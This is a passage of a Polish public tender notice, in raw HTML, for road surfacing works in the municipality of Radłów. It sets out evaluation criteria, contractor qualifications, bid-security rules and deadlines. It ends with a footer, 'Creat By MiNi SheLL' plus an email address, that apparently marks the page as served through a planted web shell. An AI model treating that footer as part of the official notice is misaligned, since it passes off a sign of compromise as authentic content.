kruszywa łamanego o grubości 20 cm<br/>􀀀 na powierzchni 1250 m2<br/>􀀀 Wykonaniu górnej warstwy podbudowy z kruszywa łamanego o grubości 10 cm<br/>􀀀 na powierzchni 1250 m2<br/>􀀀 Formowaniu poboczy ziemnych z ziemi dostarczonej samochodami wraz z zagęszczeniem 50 m3 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233220-7 - Roboty w zakresie nawierzchni dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-10-01</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami i<br/>odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>Lp. Opis kryterium oceny Znaczenie (%)<br/>1. Cena 60 punktów<br/>2. Okres gwarancji jakości 40 punktów<br/>Razem 100 punktów<br/>2. Sposób dokonywania oceny:<br/>a) Sposób oceny ofert w kryterium cena:<br/>Pc = (Cbn /Cb) x 60 punktów<br/>Gdzie: Pc - liczba punktów<br/>Cbn - najniższa ze wszystkich ofert cena ofertowa brutto;<br/>Cb - proponowana w danej ofercie cena ofertowa brutto.<br/>b) Sposób oceny ofert w kryterium okres gwarancji jakości (Pg):<br/>• Zaoferowanie 36 miesięcy gwarancji – 0 pkt.<br/>• Zaoferowanie 42 miesięcy gwarancji – 10 pkt.<br/>• Zaoferowanie 48 miesięcy gwarancji – 20 pkt.<br/>• Zaoferowanie 54 miesięcy gwarancji – 30 pkt.<br/>• Zaoferowanie 60 miesięcy gwarancji – 40 pkt.<br/>Zamawiający informuje, iż za najdłuższy realny okres gwarancji jakości przyjmuje okres 60 miesięcy.<br/>Minimalny natomiast wymagany przez Zamawiającego okres gwarancji wynosi 36 miesięcy.<br/>c) Całkowita „Liczba punktów”, zostanie obliczona w następujący sposób:<br/>Lp = Pc + Pg, gdzie:<br/>Lp - całkowita liczba punktów uzyskanych przez ofertę<br/>Pc - liczba punktów uzyskanych w kryterium cena<br/>Pg - liczba punktów uzyskanych w kryterium okres gwarancji.<br/>3. Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.<br/>4. Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona<br/>z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji jaqkości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp, zamawiający określa warunek/warunki udziału w postępowaniu dotyczące:<br/>1) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający uzna, że wykonawca spełnia warunek w/w zakresie jeżeli: wykaże, że jest ubezpieczony od odpowiedzialności<br/>cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na sumę gwarancyjną co najmniej<br/>400.000,00 zł (słownie: czterysta tysięcy złotych 00/100).<br/>W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców warunek zostanie<br/>uznany za spełniony, jeżeli co najmniej 1 z wykonawców lub wszyscy łącznie wykażą, że spełniają w/w opisany warunek.<br/>Jeżeli z uzasadnionej przyczyny Wykonawca nie może złożyć dokumentów dotyczących sytuacji finansowej lub<br/>ekonomicznej o których mowa powyżej, może złożyć inny dokument, który w wystarczający sposób potwierdza spełnianie<br/>opisanego przez zamawiającego warunku udziału w postępowaniu.<br/>Podmiot, który zobowiązał się do udostępnienia zasobów, odpowiada solidarnie z wykonawcą, który polega na jego sytuacji<br/>finansowej lub ekonomicznej, za szkodę poniesioną przez zamawiającego powstałą wskutek nieudostępnienia tych<br/>zasobów, chyba że za nieudostępnienie zasobów podmiot ten nie ponosi winy.<br/>2) zdolności technicznej lub zawodowej:<br/>a) Zamawiający uzna, że wykonawca spełnia warunek w/w zakresie jeżeli wykaże, że wykonał w sposób należyty, zgodnie z<br/>przepisami prawa budowlanego i prawidłowo ukończył, nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu<br/>składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 2 roboty budowlane -<br/>drogowe polegającą na budowie, przebudowie lub remoncie drogi lub dróg o nawierzchni z kruszywa łamanego, o wartości<br/>każdej co najmniej 250.000,00 zł brutto ( dwieście pięćdziesiąt tysięcy złotych brutto).<br/>Na potwierdzenie spełnienia powyższego warunku Wykonawca do swojej oferty zobowiązany jest dołączyć Wykaz<br/>wykonanych robót wraz z dowodami określającymi, czy prace te zostały wykonane należycie (protokoły odbioru lub<br/>referencje).<br/>Ocena zostanie dokonana na podstawie następujących dokumentów: „wykaz robót”, zał. nr 4 oraz protokołów odbioru lub<br/>referencji wyżej wymienionych prac dokonanych/wystawionych zleceniodawcę.<br/>• Ww. doświadczenie należy wykazać poprzez podanie: nazw zadań, rodzaju wykonywanych prac, wartości prac, dat i<br/>miejsca wykonania, podmiotu, na rzecz którego wykonano ww. roboty. Należy dołączyć dokumenty potwierdzające ich<br/>należyte wykonanie.<br/>b) dysponuje lub będzie dysponował co najmniej jedną osobą spełniającą poniższe wymogi:<br/>• trzyletnie doświadczenie w kierowaniu pracami budowlanymi, specjalności drogowej<br/>• Wykaże, że dysponuje lub będzie dysponował osobami, które będą uczestniczyć w<br/>realizacji zamówienia, tj. dysponuje kadrą kierowniczą niezbędną do realizacji<br/>przedmiotu zamówienia, przedstawi informacje na temat kwalifikacji kadry wraz z<br/>kopiami uprawnień budowlanych w wymaganych specjalnościach budowlanych,<br/>aktualne zaświadczenia o wpisie na listę członków właściwej izby samorządu<br/>zawodowego.<br/>W zakresie potwierdzenia spełnienia warunków udziału w postępowaniu Wykonawca wraz z ofertą złoży wykaz osób<br/>skierowanych do realizacji zamówienia oraz załączy uprawnienia budowlane w specjalności drogowej, aktualne<br/>zaświadczenie o wpisie na listę członków właściwej izby samorządu zawodowego.<br/>Ocena zostanie dokonana na podstawie następujących dokumentów: „wykaz osób”, zał. nr 5 - zawierającego oświadczenie<br/>wykonawcy odnośnie do skierowania do prac tychże osób, a także informacje co do kwalifikacji tych osób (wskazać rodzaj<br/>uprawnień, numer uprawnień, datę wystawienia uprawnień, wykształcenie, doświadczenie).<br/>INFORMACJE DLA CAŁOŚCI ZAKRESU<br/>Odnośnie do wykonawców wspólnie ubiegających się o udzielenie zamówienia mogą oni polegać na zdolnościach tych z<br/>wykonawców, którzy wykonają roboty budowlane, do realizacji których te zdolności są wymagane.<br/>W takim przypadku Wykonawcy składają oświadczenie, określone w art. 117 ust. 4 ustawy Pzp, którego wzór określony<br/>został w Załączniku nr 3 do SWZ.<br/>W przypadku posługiwania się przez wykonawcę cudzym potencjałem, wykonawcy mogą polegać na zdolnościach<br/>podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty budowlane, do realizacji których te zdolności są<br/>wymagane.<br/>Formularz wykaz robót stanowi Załącznik nr 4 do SWZ i jest składany na wezwanie Zamawiającego <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W zakresie potwierdzenia<br/>braku podstaw do wykluczenia:<br/>oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu złożonym na podstawie art. 125 ust. 1 Pzp, w zakresie<br/>podstaw wykluczenia<br/>z postępowania wskazanych przez Zamawiającego, o których mowa w:<br/>a) art. 108 ust. 1 pkt. ustawy Pzp,<br/>b) w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 roku o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji<br/>na Ukrainę oraz służących ochronie bezpieczeństwa narodowego którego wzór stanowi Załącznik nr 7 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Kosztorys ofertowy –<br/>Wykonawca składa wraz z ofertą kosztorys ofertowy, sporządzony na podstawie przedmiaru robót (zał. Nr 10 SWZ)<br/>(UWAGA - Kosztorysy ofertowe należy sporządzić oddzielnie dla każdego zakresu)<br/>b) Wadium<br/>Wymagana forma:<br/>• Wniesienie wadium w poręczeniach lub gwarancjach powinno obejmować przekazanie tego dokumentu w takiej formie, w jakiej<br/>został on ustanowiony przez gwaranta, tj. oryginału dokumentu podpisanego kwalifikowanym podpisem elektronicznym przez jego<br/>wystawcę.<br/>• Zamawiający zaleca załączenie do oferty dokumentu potwierdzającego wniesienie wadium w pieniądzu na rachunek bankowy<br/>zamawiającego. Czynność ta skróci czas badania ofert.<br/>c) Informacja RODO (załącznik nr 8 do SWZ)<br/>d) W zakresie potwierdzenia spełniania warunków udziału w postępowaniu:<br/>• Zamawiający uzna, że wykonawca spełnia warunek w/w zakresie jeżeli wykaże, że wykonał w sposób należyty, zgodnie z<br/>przepisami prawa budowlanego i prawidłowo ukończył, nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania<br/>ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 2 roboty budowlane - drogowe polegającą na<br/>budowie, przebudowie lub remoncie drogi lub dróg o nawierzchni z kruszywa łamanego, o wartości każdej co najmniej 250.000,00 zł<br/>brutto ( dwieście pięćdziesiąt tysięcy złotych brutto).<br/>• Na potwierdzenie spełnienia powyższego warunku Wykonawca do swojej oferty zobowiązany jest dołączyć Wykaz wykonanych<br/>robót wraz z dowodami określającymi, czy prace te zostały wykonane należycie (protokoły odbioru lub referencje).<br/>• Ocena zostanie dokonana na podstawie następujących dokumentów: „wykaz robót”, zał. nr 4 oraz protokołów odbioru lub referencji<br/>wyżej wymienionych prac dokonanych/wystawionych zleceniodawcę.<br/>• Ww. doświadczenie należy wykazać poprzez podanie: nazw zadań, rodzaju wykonywanych prac, wartości prac, dat i miejsca<br/>wykonania, podmiotu, na rzecz którego wykonano ww. roboty należycie.<br/>Niniejszy „wykaz robót”, zał. nr 4 wykonawca składa na wezwanie zamawiającego.<br/>e) W zakresie potwierdzenia sytuacji ekonomicznej lub finansowej:<br/>􀀀 Zamawiający wymaga złożenia dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w<br/>zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez zamawiającego, w<br/>Rozdziale II ust. 7 pkt. 1) SWZ.<br/>􀀀 Zamawiający uzna, że wykonawca spełnia warunek w/w zakresie jeżeli: wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na sumę gwarancyjną co najmniej 400.000,00<br/>zł (słownie: czterysta tysięcy złotych 00/100).<br/>􀀀 W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców warunek zostanie uznany<br/>za spełniony, jeżeli co najmniej 1 z wykonawców lub wszyscy łącznie wykażą, że spełniają w/w opisany warunek.<br/>􀀀 Jeżeli z uzasadnionej przyczyny Wykonawca nie może złożyć dokumentów dotyczących sytuacji finansowej lub ekonomicznej o<br/>których mowa powyżej, może złożyć inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez<br/>zamawiającego warunku udziału w postępowaniu.<br/>􀀀 Podmiot, który zobowiązał się do udostępnienia zasobów, odpowiada solidarnie z wykonawcą, który polega na jego sytuacji<br/>finansowej lub ekonomicznej, za szkodę poniesioną przez zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba<br/>że za nieudostępnienie zasobów podmiot ten nie ponosi winy.<br/>Dokumenty potwierdzające spełnienie wymagań w zakresie potwierdzenia sytuacji ekonomicznej lub finansowej wykonawca składa<br/>na wezwanie zamawiającego<br/>f) zdolności technicznej lub zawodowej:<br/>Ocena zostanie dokonana na podstawie następujących dokumentów: „wykaz osób”, zał. nr 5 -</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wymagania dotyczące wadium<br/>1) Wykonawca przystępujący do postępowania jest zobowiązany, przed upływem terminu składania ofert, wnieść wadium w<br/>kwocie: 5.000,00 zł<br/>2) Wadium musi obejmować pełen okres związania ofertą, tj. do dnia 08.08.2025 r.<br/>Wadium może być wniesione w jednej lub kilku formach wskazanych w art. 97 ust. 7 ustawy Pzp. to jest w :<br/>a) pieniądzu;<br/>b) gwarancjach bankowych;<br/>c) gwarancjach ubezpieczeniowych;<br/>d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2025.0.98).<br/>3) Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy w banku w Banku Spółdzielczym<br/>Rzemiosła Oddział Radłów Nr 10858900060240000000260004 z dopiskiem “wpłata wadium – sprawa nr PPI.271.23.25<br/>4) Wadium w pieniądzu musi wpłynąć na wskazany rachunek bankowy zamawiającego najpóźniej przed upływem terminu<br/>składania ofert (decyduje data wpływu na rachunek bankowy zamawiającego).<br/>5) Wadium wnoszone w poręczeniach lub gwarancjach należy załączyć do oferty w oryginale w postaci dokumentu<br/>elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez wystawcę dokumentu i powinno zawierać<br/>następujące elementy:<br/>- nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji (zamawiającego), gwaranta/poręczyciela oraz wskazanie<br/>ich siedzib. Beneficjentem wskazanym w gwarancji lub poręczeniu musi być Gmina Radłów z siedzibą ul. Kolejowa 7, 33-<br/>130 Radłów<br/>- określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,<br/>- kwotę gwarancji/poręczenia,<br/>- termin ważności gwarancji/poręczenia,<br/>- zobowiązanie gwaranta do zapłacenia kwoty gwarancji/poręczenia bezwarunkowo, na pierwsze pisemne żądanie<br/>zamawiającego, w sytuacjach określonych w art. 98 ust. 6 ustawy Pzp.<br/>6) W przypadku, gdy wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium<br/>nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium, w przypadku o którym mowa w art. 98<br/>ust. 2 pkt 3 ustawy Pzp, zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp.<br/>7) Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1–5 ustawy Pzp.<br/>8) Zamawiający zatrzymuje wadium wraz z odsetkami na podstawie art. 98 ust. 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Odnośnie do wykonawców wspólnie ubiegających się o udzielenie zamówienia mogą oni polegać na zdolnościach tych z<br/>wykonawców, którzy wykonają roboty budowlane, do realizacji których te zdolności są wymagane.<br/>W takim przypadku Wykonawcy składają oświadczenie, określone w art. 117 ust. 4 ustawy Pzp, którego wzór określony<br/>został w Załączniku nr 6 do SWZ.<br/>W przypadku posługiwania się przez wykonawcę cudzym potencjałem, wykonawcy mogą polegać na zdolnościach<br/>podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty budowlane, do realizacji których te zdolności są<br/>wymagane. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Określono w projektowanych postanowieniach umowy Załącznik nr 9; SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-07-10 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-07-10 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-08-08</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com